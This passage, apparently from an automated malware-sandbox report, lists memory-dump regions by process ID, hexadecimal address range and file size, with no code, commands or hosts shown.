                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                  • memory/736-217-0x0000000004F02000-0x0000000004F03000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/736-251-0x0000000007CB0000-0x0000000007CCC000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    112KB

                                                                                                                  • memory/736-326-0x0000000007560000-0x0000000007B88000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    6.2MB

                                                                                                                  • memory/736-245-0x0000000007D80000-0x0000000007DE6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                  • memory/736-330-0x0000000009580000-0x00000000095B3000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    204KB

                                                                                                                  • memory/736-247-0x0000000007DF0000-0x0000000008140000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    3.3MB

                                                                                                                  • memory/736-332-0x000000007EFF0000-0x000000007EFF1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1036-227-0x0000000005072000-0x0000000005073000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1036-253-0x0000000008380000-0x00000000083CB000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    300KB

                                                                                                                  • memory/1036-327-0x000000007E7A0000-0x000000007E7A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1036-252-0x0000000008340000-0x000000000835C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    112KB

                                                                                                                  • memory/1036-248-0x0000000008460000-0x00000000087B0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    3.3MB

                                                                                                                  • memory/1036-255-0x0000000008B70000-0x0000000008BE6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                  • memory/1036-246-0x00000000083F0000-0x0000000008456000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                  • memory/1036-329-0x0000000009C10000-0x0000000009C43000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    204KB

                                                                                                                  • memory/1036-325-0x0000000007A60000-0x0000000008088000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    6.2MB

                                                                                                                  • memory/1036-244-0x00000000082D0000-0x0000000008336000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                  • memory/1036-263-0x0000000003700000-0x0000000003701000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1036-220-0x0000000007A60000-0x0000000008088000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    6.2MB

                                                                                                                  • memory/1036-222-0x0000000005070000-0x0000000005071000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1036-241-0x00000000082A0000-0x00000000082C2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/1036-184-0x0000000003700000-0x0000000003701000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1036-209-0x0000000005010000-0x0000000005046000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    216KB

                                                                                                                  • memory/1036-190-0x0000000003700000-0x0000000003701000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1048-239-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1052-302-0x0000012062EC0000-0x0000012062EC2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1052-300-0x0000012062EC0000-0x0000012062EC2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1052-319-0x0000012063870000-0x00000120638E2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1104-143-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    152KB

                                                                                                                  • memory/1104-141-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1104-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    572KB

                                                                                                                  • memory/1104-133-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    572KB

                                                                                                                  • memory/1104-142-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    572KB

                                                                                                                  • memory/1104-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-135-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1104-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-138-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1104-140-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1144-296-0x00000181ADAD0000-0x00000181ADAD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1144-298-0x00000181AE2A0000-0x00000181AE312000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1144-294-0x00000181ADAD0000-0x00000181ADAD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1192-311-0x000002E610480000-0x000002E610482000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1192-312-0x000002E610480000-0x000002E610482000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1376-318-0x0000020C6F4C0000-0x0000020C6F4C2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1376-317-0x0000020C6F4C0000-0x0000020C6F4C2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1400-303-0x0000016B78730000-0x0000016B78732000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1400-321-0x0000016B78B60000-0x0000016B78BD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1400-304-0x0000016B78730000-0x0000016B78732000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1572-225-0x00000000009A0000-0x0000000000AEA000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                  • memory/1572-229-0x0000000000400000-0x000000000089D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.6MB

                                                                                                                  • memory/1632-226-0x0000000000400000-0x0000000000884000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.5MB

                                                                                                                  • memory/1632-214-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    36KB

                                                                                                                  • memory/1820-309-0x0000021BE3B40000-0x0000021BE3B42000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1820-323-0x0000021BE4360000-0x0000021BE43D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1820-307-0x0000021BE3B40000-0x0000021BE3B42000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2220-223-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2300-299-0x000002A3F4D10000-0x000002A3F4D82000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2300-290-0x000002A3F45D0000-0x000002A3F45D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2300-289-0x000002A3F45D0000-0x000002A3F45D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2316-291-0x00000288D8E50000-0x00000288D8E52000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2316-301-0x00000288D9660000-0x00000288D96D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2316-292-0x00000288D8E50000-0x00000288D8E52000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2428-328-0x000001C89E940000-0x000001C89E9B2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2428-324-0x000001C89E0B0000-0x000001C89E0B2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2428-322-0x000001C89E0B0000-0x000001C89E0B2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2472-331-0x000001B624FD0000-0x000001B624FD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2472-335-0x000001B624FD0000-0x000001B624FD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2692-293-0x000002DA37F70000-0x000002DA37FE2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/2692-284-0x000002DA37500000-0x000002DA37502000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2692-281-0x000002DA37500000-0x000002DA37502000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2760-260-0x00000000014C0000-0x00000000014D6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    88KB

                                                                                                                  • memory/2864-189-0x0000000000DF0000-0x0000000000E08000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    96KB

                                                                                                                  • memory/2864-224-0x000000001BAA0000-0x000000001BAA2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/2864-182-0x0000000000DF0000-0x0000000000E08000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    96KB

                                                                                                                  • memory/2864-198-0x0000000001230000-0x0000000001236000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                  • memory/3244-197-0x0000000000B11000-0x0000000000B3A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/3244-218-0x00000000008A0000-0x000000000094E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/3244-228-0x0000000000400000-0x000000000089D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.6MB

                                                                                                                  • memory/3672-186-0x0000000000600000-0x0000000000608000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3672-204-0x0000000000D50000-0x0000000000D52000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/3672-183-0x0000000000600000-0x0000000000608000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3680-210-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    80KB

                                                                                                                  • memory/4016-238-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    80KB

                                                                                                                  • memory/4224-272-0x0000000000FF9000-0x00000000010FA000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.0MB

                                                                                                                  • memory/4224-276-0x00000000006E0000-0x000000000082A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                  • memory/4424-285-0x00000203E55F0000-0x00000203E55F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/4424-295-0x00000203E5560000-0x00000203E55D2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/4424-286-0x00000203E55F0000-0x00000203E55F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB